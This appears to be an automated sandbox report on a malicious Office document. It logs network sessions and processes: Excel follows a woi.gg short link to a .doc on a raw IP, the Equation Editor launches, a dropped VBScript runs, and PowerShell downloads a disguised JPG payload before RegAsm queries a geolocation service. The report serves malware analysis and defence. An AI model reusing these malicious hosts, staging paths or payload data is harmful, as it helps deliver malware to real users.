Jul 5, 2024 07:16:47.491202116 CEST	1236	IN	Data Raw: 4d 58 4f 75 6c 54 61 35 34 56 4f 43 6c 54 4c 35 6b 51 4f 45 67 7a 2f 34 51 50 4f 59 6a 44 74 34 63 49 4f 43 69 54 66 34 49 48 4f 57 68 44 54 34 34 43 4f 70 67 44 4a 34 6b 78 4e 39 66 7a 38 33 67 39 4e 54 66 6a 7a 33 4d 38 4e 6e 65 54 6e 33 49 34 Data Ascii: MXOulTa54VOClTL5kQOEgz/4QPOYjDt4cIOCiTf4IHOWhDT44COpgDJ4kxN9fz83g9NTfjz3M8NneTn3I4N9dDe302NRdzR3wyNncjI3chNkbDw2srN2azq24oNqZjN2URN9XD+1MfNoXj11QbNmWjm1sYNyVzS1MUNsUDH0AONYTzu0YLNxSDX0cFNFRjP0gDNxQzBz0+MZPT0zU8MoOjnzs3MxNDXzs0MpMzHzIxMJIz7y4tM
Jul 5, 2024 07:16:47.491214037 CEST	1236	IN	Data Raw: 4c 6a 6c 79 55 6e 4d 52 4a 6a 53 79 55 55 4d 56 48 54 47 77 6f 45 41 41 41 41 51 41 51 41 41 41 38 6a 6c 2f 45 35 50 79 35 6a 64 2b 55 6c 50 78 34 6a 4b 2b 55 53 50 34 79 44 7a 38 77 5a 4f 41 6c 6a 4e 79 63 72 4d 51 41 44 34 77 6f 4c 4d 64 43 41 Data Ascii: LjlyUnMRJjSyUUMVHTGwoEAAAAQAQAAA8jl/E5Py5jd+UlPx4jK+USP4yDz8wZOAljNycrMQAD4woLMdCAAAwCADAPAAAwPn/zy/I3PYlTG4YLOkhDY4wFOYhDV4AFOMhDS4QEOAhDP4gDOcUTYzQAAAAANAMA4AAAA2wjN4YDN2AjNsYDK2QiNgUDl1wRNYUDF1ARNMUDC1QQNAQDdzw/M4PD9zA/MsPD6zQ+MgPzVyAuMcLD2
Jul 5, 2024 07:16:47.491226912 CEST	1236	IN	Data Raw: 77 41 4d 47 41 54 41 41 41 51 41 59 41 77 41 67 42 41 41 41 38 7a 2b 2f 55 2f 50 76 2f 6a 36 2f 51 2b 50 65 2f 44 32 2f 4d 39 50 4e 2f 6a 78 2f 45 38 50 38 2b 6a 74 2f 41 37 50 71 2b 54 70 2f 38 35 50 5a 2b 7a 6b 2f 34 34 50 49 2b 6a 67 2f 77 33 Data Ascii: wAMGATAAAQAYAwAgBAAA8z+/U/Pv/j6/Q+Pe/D2/M9PN/jx/E8P8+jt/A7Pq+Tp/85PZ+zk/44PI+jg/w3P39Tc/s2Pl9DY/o1PU9jT/k0PD9TP/czPy8DL/YyPg8zG/UxPP8TC/QgP+7D++IvPt7z5+EuPb7j1+AtPK7Dx+8rP56zs+0qPo6jo+wpPW6Tk+soPF6zf+onP05Tb+YmPg1z+9QBPIyDR8cDPwwjK8QCPTsj97E+O
Jul 5, 2024 07:16:47.494926929 CEST	1236	IN	Data Raw: 70 6a 61 36 59 6d 4f 69 70 6a 55 36 30 6a 4f 72 6f 54 49 36 63 52 4f 37 6e 44 37 35 30 64 4f 57 6e 44 7a 35 49 63 4f 34 6d 6a 72 35 51 61 4f 78 6c 44 57 35 49 55 4f 70 6b 6a 49 35 59 52 4f 50 6b 44 43 34 34 4e 4f 55 6a 54 7a 34 59 4d 4f 2f 69 44 Data Ascii: pja6YmOipjU60jOroTI6cRO7nD750dOWnDz5IcO4mjr5QaOxlDW5IUOpkjI5YROPkDC44NOUjTz4YMO/iDu4QIO6hzc4sDO0gjF3o/NpDAAAAHACAIAAAQOikzG58QOIgT/4YPOujD34wMOFjTu4ILOkiTn4UJODizc4wGOghTW4sEOEhDP4oCOagzE4cAOAcj83s+NjfT038xNScDB2EvNibjr2AqNPaje2oiNdYzD1wfNtXDq

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.22	49178	91.92.254.194	80	3196	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 07:16:48.762304068 CEST	83	OUT	GET /imge/new-image_v.jpg HTTP/1.1 Host: 91.92.254.194 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.22	49179	178.237.33.50	80	3332	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 07:16:50.433237076 CEST	71	OUT	GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Jul 5, 2024 07:16:51.064069986 CEST	1170	IN	HTTP/1.1 200 OK date: Fri, 05 Jul 2024 05:16:50 GMT server: Apache content-length: 962 content-type: application/json; charset=utf-8 cache-control: public, max-age=300 access-control-allow-origin: * Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED] Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49164	104.21.11.106	443	1892	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	Bytes transferred	Direction	Data
2024-07-05 05:16:26 UTC	319	OUT	GET /1RxrR6 HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: woi.gg Connection: Keep-Alive
2024-07-05 05:16:27 UTC	1293	IN	HTTP/1.1 302 Found Date: Fri, 05 Jul 2024 05:16:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close location: http://172.232.56.138/xampp/hu/hu.hu.huhuh.doc x-shortened-by: woi.gg Cache-Control: no-cache, private vary: X-Inertia set-cookie: XSRF-TOKEN=eyJpdiI6IlU1Y1AzTG1FT21aZ253akE2VGp6Mnc9PSIsInZhbHVlIjoieWhyZVVqQ3V4aXdCNmxxVUtITDRyc3ZwY1lSNGFjdlZhM09rdmoxU3cyNmVnYU04T3ZGNW1GZzlWbjlwVjJvSXArWnBCcVZ3TzROSUJZcU5jZnlpR3B3eHVYT0xjL3hvWllDay9aS0Z6TEpscDFRaWVnSXgxREJlRk0zbmdhZFciLCJtYWMiOiIzOTE2NThjNTA3ZmRkYzhjMTIzNDQwOWYwMWJjY2YwMTExNWNlMzFhMWQ1ZDUyY2RlZmM5NmUxMmQxYmRkMjZjIiwidGFnIjoiIn0%3D; expires=Fri, 05 Jul 2024 07:16:27 GMT; Max-Age=7200; path=/; samesite=lax set-cookie: woi_session=eyJpdiI6Im5jbFJGS3A4NVNJSW45clZpSHVFOXc9PSIsInZhbHVlIjoiNU9nMjhKMUlTK0NDSVhXeWpmaUZLVWdsVE5ucjRENFMxaUxDT0ZKc2lUYzIvWU1pZmlreDg4RVJWMDdaR01pQ21rTE9YM0ptb1o1c1dsdFJyVlVaRlVRM0NYOWIxQWFxYTlvVGRPVEZkT1liREhBUFoyeG80d1dMRGRLMzRBWjgiLCJtYWMiOiIwZmQxMzk0MTY1YmIyNzk3NTFiNmNlODk5YmM2NjJkZWE5NWJlZjUwNjJjN2IwNzRlYTJiMDc0MjUwNjM0MGYyIiwidGFnIjoiIn0%3D; expires=Fri, 05 Jul 2024 07:16:27 GMT; Max-Age=7200; path=/; httponly; samesite=lax x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff CF-Cache-Status: DYNAMIC
2024-07-05 05:16:27 UTC	393	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 59 63 64 45 63 7a 59 58 33 50 62 41 34 72 32 32 69 32 61 53 66 68 63 5a 63 32 65 70 61 49 43 41 48 45 61 59 54 36 4a 7a 31 39 43 6d 76 5a 39 49 43 73 48 67 73 41 5a 33 6f 44 74 68 55 33 37 46 50 6a 39 65 4e 48 4b 30 34 74 70 70 72 31 4e 67 34 6d 45 58 4b 4d 4e 4b 33 64 31 76 6c 33 5a 61 4e 54 72 68 25 32 42 25 32 42 62 39 6c 46 6d 37 68 67 78 6e 6c 70 6a 78 6b 4e 55 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75 63 63 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YcdEczYX3PbA4r22i2aSfhcZc2epaICAHEaYT6Jz19CmvZ9ICsHgsAZ3oDthU37FPj9eNHK04tppr1Ng4mEXKMNK3d1vl3ZaNTrh%2B%2Bb9lFm7hgxnlpjxkNU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"succ
2024-07-05 05:16:27 UTC	437	IN	Data Raw: 31 61 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 3a 2f 2f 31 37 32 2e 32 33 32 2e 35 36 2e 31 33 38 2f 78 61 6d 70 70 2f 68 75 2f 68 75 2e 68 75 2e 68 75 68 75 68 2e 64 6f 63 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 32 2e 32 33 32 2e 35 36 2e 31 33 38 2f 78 61 6d 70 70 2f 68 75 2f 68 75 2e 68 75 2e 68 75 68 75 68 2e 64 6f 63 3c 2f 74 Data Ascii: 1ae<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://172.232.56.138/xampp/hu/hu.hu.huhuh.doc'" /> <title>Redirecting to http://172.232.56.138/xampp/hu/hu.hu.huhuh.doc</t
2024-07-05 05:16:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49168	172.67.148.197	443	1848	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
2024-07-05 05:16:31 UTC	832	OUT	HEAD /1RxrR6 HTTP/1.1 Connection: Keep-Alive Cookie: XSRF-TOKEN=eyJpdiI6IlU1Y1AzTG1FT21aZ253akE2VGp6Mnc9PSIsInZhbHVlIjoieWhyZVVqQ3V4aXdCNmxxVUtITDRyc3ZwY1lSNGFjdlZhM09rdmoxU3cyNmVnYU04T3ZGNW1GZzlWbjlwVjJvSXArWnBCcVZ3TzROSUJZcU5jZnlpR3B3eHVYT0xjL3hvWllDay9aS0Z6TEpscDFRaWVnSXgxREJlRk0zbmdhZFciLCJtYWMiOiIzOTE2NThjNTA3ZmRkYzhjMTIzNDQwOWYwMWJjY2YwMTExNWNlMzFhMWQ1ZDUyY2RlZmM5NmUxMmQxYmRkMjZjIiwidGFnIjoiIn0%3D; woi_session=eyJpdiI6Im5jbFJGS3A4NVNJSW45clZpSHVFOXc9PSIsInZhbHVlIjoiNU9nMjhKMUlTK0NDSVhXeWpmaUZLVWdsVE5ucjRENFMxaUxDT0ZKc2lUYzIvWU1pZmlreDg4RVJWMDdaR01pQ21rTE9YM0ptb1o1c1dsdFJyVlVaRlVRM0NYOWIxQWFxYTlvVGRPVEZkT1liREhBUFoyeG80d1dMRGRLMzRBWjgiLCJtYWMiOiIwZmQxMzk0MTY1YmIyNzk3NTFiNmNlODk5YmM2NjJkZWE5NWJlZjUwNjJjN2IwNzRlYTJiMDc0MjUwNjM0MGYyIiwidGFnIjoiIn0%3D User-Agent: Microsoft Office Existence Discovery Host: woi.gg
2024-07-05 05:16:32 UTC	1265	IN	HTTP/1.1 302 Found Date: Fri, 05 Jul 2024 05:16:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close location: http://172.232.56.138/xampp/hu/hu.hu.huhuh.doc x-shortened-by: woi.gg Cache-Control: no-cache, private vary: X-Inertia set-cookie: XSRF-TOKEN=eyJpdiI6Ing3V3ZBTitsQnhHRndCV2VTbUduMVE9PSIsInZhbHVlIjoiMGRCR0JNWXhGZkJZMXJCNVp5TWI4RldqK0thcmROKzYxcjFQck1pYURaSVpxeTV0ajFVNVd6Qmc2Z3Ava3U1OFY0YkpBTExLTWF5TElucWhMcEJPSEJkdFlleHlEK2FjQmlWeFJvN1lBRU82cDZmVkVGRlVqemRZdFl3WHVlS3QiLCJtYWMiOiI2ZTJhMmQxMzcxMjg4ZDZiYzhjNDRmYjkzZjE0OTcyNTg3MTc0NWE2MDYxZjQyODg3NWY1NjMyN2U3ZmFhNGYyIiwidGFnIjoiIn0%3D; expires=Fri, 05 Jul 2024 07:16:32 GMT; Max-Age=7200; path=/; samesite=lax set-cookie: woi_session=eyJpdiI6ImRpMXFCa29SWjhaQk02OTR6T21pWEE9PSIsInZhbHVlIjoiWXdkTjBxNjZwRW5UWnNxdmJLVUkxQzJyaDBRU2p6NzRqRDdrUk13OGpEQ2JrSVdmUFpPVnRwYllZaEt4Y2h6WUdTU1gyUTIxdVlsNlhTZ1hpdEdPRVdTSVViM0pIWXFBWHRjTVRTT3h3bDMxMDdmbnpYby9NY2JRQlEyUzd0WWMiLCJtYWMiOiI5MTk2OWM4OWUwOGY0YzEzMGUzODk3ODgyY2UxMWM2OTQ3OGViZTZlNDBkNDZiNzdhMjEwMWE0OGEzZDc4NDYzIiwidGFnIjoiIn0%3D; expires=Fri, 05 Jul 2024 07:16:32 GMT; Max-Age=7200; path=/; httponly; samesite=lax x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff CF-Cache-Status: DYNAMIC
2024-07-05 05:16:32 UTC	399	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 7a 73 25 32 42 6f 59 71 46 58 63 4b 72 41 4d 78 42 4b 75 51 35 77 31 76 4d 72 73 25 32 42 41 61 6c 61 32 5a 36 69 41 36 53 25 32 46 54 4c 30 59 36 43 71 31 71 4c 63 4a 77 51 44 47 43 63 4a 65 25 32 42 72 55 74 65 31 57 37 7a 64 48 4c 51 75 5a 34 33 58 47 41 44 41 31 61 67 69 6b 4d 39 65 56 43 57 38 53 55 58 35 30 44 34 68 76 68 61 7a 72 34 30 32 52 68 48 25 32 46 39 63 6e 7a 46 42 34 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zs%2BoYqFXcKrAMxBKuQ5w1vMrs%2BAala2Z6iA6S%2FTL0Y6Cq1qLcJwQDGCcJe%2BrUte1W7zdHLQuZ43XGADA1agikM9eVCW8SUX50D4hvhazr402RhH%2F9cnzFB4%3D"}],"group":"cf-nel","max_age":604800}NEL:

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.22	49170	172.67.148.197	443

Timestamp	Bytes transferred	Direction	Data
2024-07-05 05:16:37 UTC	842	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive Cookie: XSRF-TOKEN=eyJpdiI6IlU1Y1AzTG1FT21aZ253akE2VGp6Mnc9PSIsInZhbHVlIjoieWhyZVVqQ3V4aXdCNmxxVUtITDRyc3ZwY1lSNGFjdlZhM09rdmoxU3cyNmVnYU04T3ZGNW1GZzlWbjlwVjJvSXArWnBCcVZ3TzROSUJZcU5jZnlpR3B3eHVYT0xjL3hvWllDay9aS0Z6TEpscDFRaWVnSXgxREJlRk0zbmdhZFciLCJtYWMiOiIzOTE2NThjNTA3ZmRkYzhjMTIzNDQwOWYwMWJjY2YwMTExNWNlMzFhMWQ1ZDUyY2RlZmM5NmUxMmQxYmRkMjZjIiwidGFnIjoiIn0%3D; woi_session=eyJpdiI6Im5jbFJGS3A4NVNJSW45clZpSHVFOXc9PSIsInZhbHVlIjoiNU9nMjhKMUlTK0NDSVhXeWpmaUZLVWdsVE5ucjRENFMxaUxDT0ZKc2lUYzIvWU1pZmlreDg4RVJWMDdaR01pQ21rTE9YM0ptb1o1c1dsdFJyVlVaRlVRM0NYOWIxQWFxYTlvVGRPVEZkT1liREhBUFoyeG80d1dMRGRLMzRBWjgiLCJtYWMiOiIwZmQxMzk0MTY1YmIyNzk3NTFiNmNlODk5YmM2NjJkZWE5NWJlZjUwNjJjN2IwNzRlYTJiMDc0MjUwNjM0MGYyIiwidGFnIjoiIn0%3D User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: woi.gg
2024-07-05 05:16:37 UTC	576	IN	HTTP/1.1 405 Method Not Allowed Date: Fri, 05 Jul 2024 05:16:37 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z2RLKavGlaE8dt6VY14chqpDLMZuSeI7P2XSgylvbvgD5tMwaVUxuaxpdlow0KMp6bfGXqK5RfiyNebEqfSy4DiWT%2BfqF3VJubCI%2BnKkPESSCg5KdGq89Eo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89e4e24beb14433a-EWR alt-svc: h3=":443"; ma=86400
2024-07-05 05:16:37 UTC	156	IN	Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 96<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
2024-07-05 05:16:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.22	49171	172.67.148.197	443	1848	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
2024-07-05 05:16:38 UTC	851	OUT	HEAD /1RxrR6 HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Cookie: XSRF-TOKEN=eyJpdiI6IlU1Y1AzTG1FT21aZ253akE2VGp6Mnc9PSIsInZhbHVlIjoieWhyZVVqQ3V4aXdCNmxxVUtITDRyc3ZwY1lSNGFjdlZhM09rdmoxU3cyNmVnYU04T3ZGNW1GZzlWbjlwVjJvSXArWnBCcVZ3TzROSUJZcU5jZnlpR3B3eHVYT0xjL3hvWllDay9aS0Z6TEpscDFRaWVnSXgxREJlRk0zbmdhZFciLCJtYWMiOiIzOTE2NThjNTA3ZmRkYzhjMTIzNDQwOWYwMWJjY2YwMTExNWNlMzFhMWQ1ZDUyY2RlZmM5NmUxMmQxYmRkMjZjIiwidGFnIjoiIn0%3D; woi_session=eyJpdiI6Im5jbFJGS3A4NVNJSW45clZpSHVFOXc9PSIsInZhbHVlIjoiNU9nMjhKMUlTK0NDSVhXeWpmaUZLVWdsVE5ucjRENFMxaUxDT0ZKc2lUYzIvWU1pZmlreDg4RVJWMDdaR01pQ21rTE9YM0ptb1o1c1dsdFJyVlVaRlVRM0NYOWIxQWFxYTlvVGRPVEZkT1liREhBUFoyeG80d1dMRGRLMzRBWjgiLCJtYWMiOiIwZmQxMzk0MTY1YmIyNzk3NTFiNmNlODk5YmM2NjJkZWE5NWJlZjUwNjJjN2IwNzRlYTJiMDc0MjUwNjM0MGYyIiwidGFnIjoiIn0%3D Content-Length: 0 Connection: Keep-Alive Host: woi.gg
2024-07-05 05:16:39 UTC	1265	IN	HTTP/1.1 302 Found Date: Fri, 05 Jul 2024 05:16:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close location: http://172.232.56.138/xampp/hu/hu.hu.huhuh.doc x-shortened-by: woi.gg Cache-Control: no-cache, private vary: X-Inertia set-cookie: XSRF-TOKEN=eyJpdiI6Ikt0QmlJSWNRbTdrbFJQRENXeXB1Unc9PSIsInZhbHVlIjoiVjZ2Qk5BUndobTdsSzQ5ZHlJQVVGRWp1cGtUOVpFOUxrSmtjMEozN3MySjROTXFJdzlwMFdsakhNRmd5ZGkyMFNuVWdZSTJpTGdiTVY5d2h5OEUyZUdMcDZCdDQzc1BlcnQ2QUh4K0ZzUkN3eTRNbVJsNm94QURIaTl2dDdVRmQiLCJtYWMiOiI3Zjc2Y2MwMTI1YWYwMTFjNTQxMTE3MTY5NzU2Y2M0MmViNDI1MjBlMjgxYjI1MzA3ZjdiNjBjMzVjNjg4ZWI1IiwidGFnIjoiIn0%3D; expires=Fri, 05 Jul 2024 07:16:39 GMT; Max-Age=7200; path=/; samesite=lax set-cookie: woi_session=eyJpdiI6IjhYZkUzN0RxcXlpNzFBN09OUTdDbFE9PSIsInZhbHVlIjoibFVrc3UzTUEwU3dqUlM5KzdoOHZGZkRCS3p0dUxlM1pHVWJ6ajFSYSt5bTJtWDJzYWU1YUphWkVvKzNNVEcyUnFIYjcrUUlXVXRJSCsyWlozT3hnamV2Q0doWkIwai9xblhpSk1WVnIxZkt4bk1VMlNPLzBieExZbTNjMlNqWmIiLCJtYWMiOiI3OWZmNGM2Y2FmNmIyYzEyMzk0N2QyYzBjMmNhY2U2NTE0YmI0OWNmYzliMWYyNTEyYTdiY2JmYTUwNzY4NDM5IiwidGFnIjoiIn0%3D; expires=Fri, 05 Jul 2024 07:16:39 GMT; Max-Age=7200; path=/; httponly; samesite=lax x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff CF-Cache-Status: DYNAMIC
2024-07-05 05:16:39 UTC	397	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 76 59 34 52 64 44 54 48 79 4a 67 41 4c 25 32 46 56 78 25 32 46 43 6c 6b 67 76 49 37 4f 6a 39 4b 5a 70 73 68 6a 4d 43 58 68 34 4c 6e 48 6e 41 68 6f 56 37 74 54 67 4d 41 58 30 51 4b 42 78 55 7a 73 72 4d 5a 71 62 77 30 35 53 47 57 74 52 4c 47 49 6c 36 50 56 55 69 55 49 74 33 59 41 30 45 7a 72 4f 52 31 6c 44 25 32 42 66 69 43 6d 75 41 56 76 6a 34 50 53 44 65 57 4a 38 46 25 32 42 41 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vY4RdDTHyJgAL%2FVx%2FClkgvI7Oj9KZpshjMCXh4LnHnAhoV7tTgMAX0QKBxUzsrMZqbw05SGWtRLGIl6PVUiUIt3YA0EzrOR1lD%2BfiCmuAVvj4PSDeWJ8F%2BA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"

Target ID:	0
Start time:	01:16:04
Start date:	05/07/2024
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f9f0000
File size:	28'253'536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	01:16:27
Start date:	05/07/2024
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
Imagebase:	0x13f090000
File size:	1'423'704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	01:16:39
Start date:	05/07/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0xffe30000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	01:16:40
Start date:	05/07/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodflowersandgoodreturn.vBS"
Imagebase:	0x270000
File size:	141'824 bytes
MD5 hash:	979D74799EA6C8B8167869A68DF5204A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	01:16:41
Start date:	05/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
